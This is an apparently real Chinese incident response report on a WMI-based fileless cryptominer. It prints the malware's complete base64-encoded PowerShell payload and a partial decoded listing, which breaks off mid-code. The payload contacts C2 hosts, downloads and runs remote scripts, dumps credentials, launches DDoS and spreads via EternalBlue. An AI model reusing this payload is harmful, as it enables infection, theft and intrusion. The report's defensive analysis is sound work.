無文件挖礦應急響應處置報告

一、情況概述

1.1 情況拓撲

由於運維過程中可能存在違規操作、過失操作或者防護能力不足導致被惡意操作使得主機遭受挖礦程序的侵害，該挖礦程序會下載惡意程序至WMI中，實現無文件挖礦和內網滲透，並下載DDOS攻擊程序和通過任務計劃每隔20分鐘自動生成版本校驗惡意程序。

1.2 情況簡介

2019年4月4日收到用戶告警，內網主機存在CPU過高現象，同時網絡異常監測預警平臺告警內網主機有主動連接礦池行爲。

1.3 分析思路

挖礦程序如要體現出長久穩定的產出貨幣價值，其基礎功能實現、長期運行、自我隱藏和自我傳播的基本特性必不可少。遂根據惡意人員的攻擊基本意圖進行分析：

1.檢查挖礦運行過程；

2.檢查其自我傳播的方式方法；

3.檢查其如何長期運行；

4.檢查其如何滲透至操作系統中；

嘗試通過分析以上過程，從而閉環各個惡意環節的攻擊流程。

二、主機挖礦行爲分析處置

2.1 現狀描述

該主機CPU使用率75%：Powershell.exe佔用CPU較高，對其進行檢查。

2.2 父子進程對應表

wmic process得到的相關進程名、父進程、子進程經梳理後對應表如下所示：

Caption	ParentProcessId	ProcessId
wininit.exe	348	388
services.exe	388	504
svchost.exe	504	624
WmiPrvSE.exe	624	5148
powershell.exe	5148	3964
powershell.exe	3964	3180

各程序CommandLine詳見後續。

2.3 wininit.exe

CommandLine：wininit.exe

Windows啓動應用程序。用於啓動services.exe(服務控制管理器)、lsass.exe(本地安全授權)、lsm.exe(本地會話管理器)。

2.4 services.exe

CommandLine：C:\Windows\system32\services.exe

Windows服務管理應用程序。

2.5 svchost.exe

CommandLine：C:\Windows\system32\svchost.exe-k DcomLaunch

DCOMLAUNCH服務可啓動COM和DCOM服務器，以響應對象激活請求。

2.6 WmiPrvSE.exe

CommandLine：C:\Windows\system32\wbem\wmiprvse.exe

wmiprvse.exe是微軟Windows操作系統的一部分，用於通過WinMgmt.exe程序處理WMI操作。

2.7 powershell.exe（PID 3964）

CommandLine：powershell.exe-NoP -NonI -W Hidden -E

JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwApACwAKAAnAGkAbgBmAG8ALgA3AGgANAB1AGsALgBjAG8AbQAnACkALAAoACcAMQAxADEALgA5ADAALgAxADQANQAuADUAMgAnACkALAAoACcAMQA4ADUALgAyADMANAAuADIAMQA3AC4AMQAzADkAJwApACkADQAKACQAYQB2AGcAcwAgAD0AIABAACgAKQANAAoAJABuAGkAYwAgAD0AIAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAzADsAJABpACsAKwApAHsADQAKAAkAJABzAHUAbQAgAD0AIAAwAA0ACgAJACQAYwBvAHUAbgB0ACAAPQAgADAADQAKAAkAZgBvAHIAKAAkAGoAPQAxADsAJABqACAALQBsAGUAIAA0ADsAJABqACsAKwApAHsADQAKAAkACQAkAHQAbQBwACAAPQAgACgAJABwAGkAbgAuAHMAZQBuAGQAKAAkAHMAZQBbACQAaQBdACkAKQAuAFIAbwB1AG4AZAB0AHIAaQBwAFQAaQBtAGUADQAKAAkACQBpAGYAIAAoACQAdABtAHAAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAJACQAYwBvAHUAbgB0ACAAKwA9ACAAMQANAAoACQAJAH0ADQAKAAkACQAkAHMAdQBtACAAKwA9ACAAJAB0AG0AcAANAAoACQB9AA0ACgAJAGkAZgAgACgAJABjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAkAGEAdgBnAHMAIAArAD0AIAAkAHMAdQBtAC8AJABjAG8AdQBuAHQADQAKAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJACQAYQB2AGcAcwAgACsAPQAgADAADQAKAAkAfQANAAoACQBpAGYAIAAoACQAaQAgAC0AZQBxACAAMAApAHsADQAKAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAzADAAMAApACAALQBhAG4AZAAgACgAJABhAHYAZwBzAFsAMABdACAALQBuAGUAIAAwACkAKQB7AA0ACgAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADEAKQB7AA0ACgAJAAkAaQBmACAAKAAkAGEAdgBnAHMAWwAxAF0AIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAkAGEAdgBnAHMAWwAxAF0AKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQAJAGIAcgBlAGEAawANAAoACQAJAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADEAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADIAKQB7AA0ACgAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAMwAwADAAKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkAfQANAAoACQB9AA0ACgAJAGkAZgAgACgAJABpACAALQBlAHEAIAAzACkAewANAAoACQAJAGkAZgAgACgAJABhAHYAZwBzAFsAMwBdACAALQBuAGUAIAAwACkAewANAAoACQAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAJABhAHYAZwBzAFsAMwBdACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAyAF0AIAAtAG4AZQAgADAAKQApAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0AZQBsAHMAZQB7AA0ACgAJAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAzAF0ADQAKAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQB9AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACgAJwA6ACcAKwAnADQANAAzACcAKQANAAoAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdgBlAHIALgB0AHgAdAAiACkALgBUAHIAaQBtACgAKQANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewANAAoAIAAgACAAIAAkAHYAZQByAF8AdABtAHAAPQAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwB2AGUAcgAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJAB2AGUAcgBfAHQAbQBwACkAewANAAoAIAAgACAAIAAgACAAIAAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvACQAbgBpAGMALwBhAG4AdABpAHYAaQByAHUAcwAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKACQAcwB0AGkAbQBlAD0AWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQADQAKACQAZgB1AG4AcwAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQANAAoAJABkAGUAZgB1AG4APQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAdQBuAHMAKQApAA0ACgBpAGUAeAAgACQAZABlAGYAdQBuAA0ACgANAAoARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBmAGkAbAB0AGUAcgAgAC0AbgBvAHQAbQBhAHQAYwBoACAAJwBXAGkAbgBkAG8AdwBzACAARQB2AGUAbgB0AHMAJwB9ACAAfABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0AA0ACgANAAoADQAKAFsAYQByAHIAYQB5AF0AJABwAHMAaQBkAHMAPQAgAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAB8AHMAbwByAHQAIABjAHAAdQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBpAGQAfQANAAoAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoAJABlAHgAaQBzAHQAPQAkAEYAYQBsAHMAZQANAAoAaQBmACAAKAAkAHAAcwBpAGQAcwAgAC0AbgBlACAAJABuAHUAbABsACAAKQANAAoAewANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJABuAHUAbABsACkADQAKACAAIAAgACAAIAAgACAAIAB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAcABzAGkAZABzACAALQBjAG8AbgB0AGEAaQBuAHMAIAAkAGwAaQBuAGUAWwAtADEAXQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAoACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADAAIAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAxADQANAA0ADQAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAFIAdQBuAEQARABPAFMAIAAiAGMAbwBoAGUAcgBuAGUAYwBlAC4AZQB4AGUAIgANAAoASwBpAGwAbABCAG8AdAAoACcAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADcANwA3ADcAIgApACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7AA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlACAAOwBpAGUAeAAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAYAAkAGYAdQBuAHMAKQApACkAOwBJAG4AdgBvAGsAZQAtAEMAbwBtAG0AYQBuAGQAIAAgAC0AUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAAYAAkAFIAZQBtAG8AdABlAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABAACgAYAAkAG0AbwBuACwAIABgACQAbQBvAG4ALAAgACcAVgBvAGkAZAAnACwAIAAwACwAIAAnACcALAAgACcAJwApAGAAIgAiAA0ACgAgACAAIAAgACQAdgBiAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAA0ACgAgACAAIAAgACQAdgBiAHMALgByAHUAbgAoACQAYwBtAGQAbQBvAG4ALAAwACkADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AaQBtAGkAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKAGkAZgAgACgAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0ALgBsAGUAbgBnAHQAaAAgAC0AbgBlACAAMwAyACkADQAKAHsADQAKACAAIAAgACAAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0AIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABhAHMAYwBpAGkAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYQAyADUAaABZADIAdABsAGMAbQBWAGsALgB0AHgAdAAiAA0ACgB9AA0ACgANAAoAJABOAGUAdAB3AG8AcgBrAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAbgB1AGwAbAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQBwAHMAdQAnAF0ALgBWAGEAbAB1AGUADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAHMAYwAnAF0ALgBWAGEAbAB1AGUADQAKAFsAYgB5AHQAZQBbAF0AXQAkAHMAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHMAYwBiAGEAKQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABOAGUAdAB3AG8AcgBrACAAaQBuACAAJABOAGUAdAB3AG8AcgBrAHMAKQANAAoAewANAAoADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAUABBAGQAZAByAGUAcwBzAFQAbwBTAHQAcgBpAG4AZwANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACQAUwB1AGIAbgBlAHQATQBhAHMAawAgACAAPQAgACcAMgA1ADUALgAyADUANQAuADIANQA1AC4AMAAnAA0ACgAgACAAIAAgACQAaQBwAHMAXwBjAD0ARwBlAHQALQBuAGUAdAB3AG8AcgBrAHIAYQBuAGcAZQAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsADQAKACAAIAAgACAAJABpAHAAcwBfAGIAPQBHAGUAdAAtAEkAcABJAG4AQgAgACQASQBQAEEAZABkAHIAZQBzAHMADQAKACAAIAAgACAAJABpAHAAcwA9ACQAaQBwAHMAXwBjACsAJABpAHAAcwBfAGIADQAKAAkAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoACQBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQBpAGYAIAAoACQAbABpAG4AZQAuAGMAbwB1AG4AdAAgAC0AbABlACAANAApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQAkAGkAPQAkAGwAaQBuAGUAWwAtADMAXQAuAHMAcABsAGkAdAAoACcAOgAnACkAWwAwAF0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACAAKAAkAGwAaQBuAGUAWwAtADIAXQAgAC0AZQBxACAAJwBFAFMAVABBAEIATABJAFMASABFAEQAJwApACAALQBhAG4AZAAgACAAKAAkAGkAIAAtAG4AZQAgACcAMQAyADcALgAwAC4AMAAuADEAJwApACAALQBhAG4AZAAgACgAJABpAHAAcwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBwAHMAKwA9ACQAaQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABpAHAAIABpAG4AIAAkAGkAcABzACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAHAAIAAtAGUAcQAgACQASQBQAEEAZABkAHIAZQBzAHMAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkACQAJAGkAZgAgACgAKABUAGUAcwB0AC0AUABvAHIAdAAgACQAaQBwACkAIAAtAG4AZQAgACQAZgBhAGwAcwBlACAALQBhAG4AZAAgACQAaQBwAHMAdQAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQANAAoACQAJAAkACQBpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAcgBlAHMAPQBlAGIANwAgACQAaQBwACAAJABzAGMADQAKAAkACQAJAAkACQBpAGYAIAAoACEAKAAkAHIAZQBzACAALQBlAHEAIAAkAHQAcgB1AGUAKQApAA0ACgAJAAkACQAJAAkAewBlAGIAOAAgACQAaQBwACAAJABzAGMAfQANAAoACQAJAAkACQAJACQAaQAxADcAIAA9ACAAJABpADEANwAgACsAIAAiACAAIgArACQAaQBwAA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAfQANAAoADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==

powershell.exe是一種命令行外殼程序和腳本環境。參數簡介如下所示：

序號	參數	簡介
1	-NoP	不加載Windows PowerShell配置文件
2	-NonI	命令行運行後不和用戶進行交互
3	-W Hidden	將命令行運行窗口隱藏
4	-E	接受base-64編碼字符串版本的命令

個人不會代碼，所以對上述base64字符串進行解碼並添加代碼塊簡意是連蒙帶猜的，主要表達其中有部分內容將下一步工作指向WMI，如上所述在應急過程中進行是最好的，我當時是根據關鍵字查找大牛已經寫過的材料進行下一步工作：

$pin = new-object system.net.networkinformation.ping

$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('111.90.145.52'),('185.234.217.139'))

$avgs = @()

$nic = 'update.7h4uk.com'

for($i=0;$i -le 3;$i++){

$sum = 0

$count = 0

//判斷服務端是否在線和延時情況以連接對應的域名或IP

for($j=1;$j -le 4;$j++){

$tmp =($pin.send($se[$i])).RoundtripTime

if ($tmp -ne 0){

$count += 1

}

$sum += $tmp

}

if ($count -ne 0){

$avgs += $sum/$count

}else{

$avgs += 0

}

if ($i -eq 0){

if (($avgs[0] -le 300) -and($avgs[0] -ne 0)){

$nic = $se[0]

break

}

if ($i -eq 1){

if ($avgs[1] -ne 0){

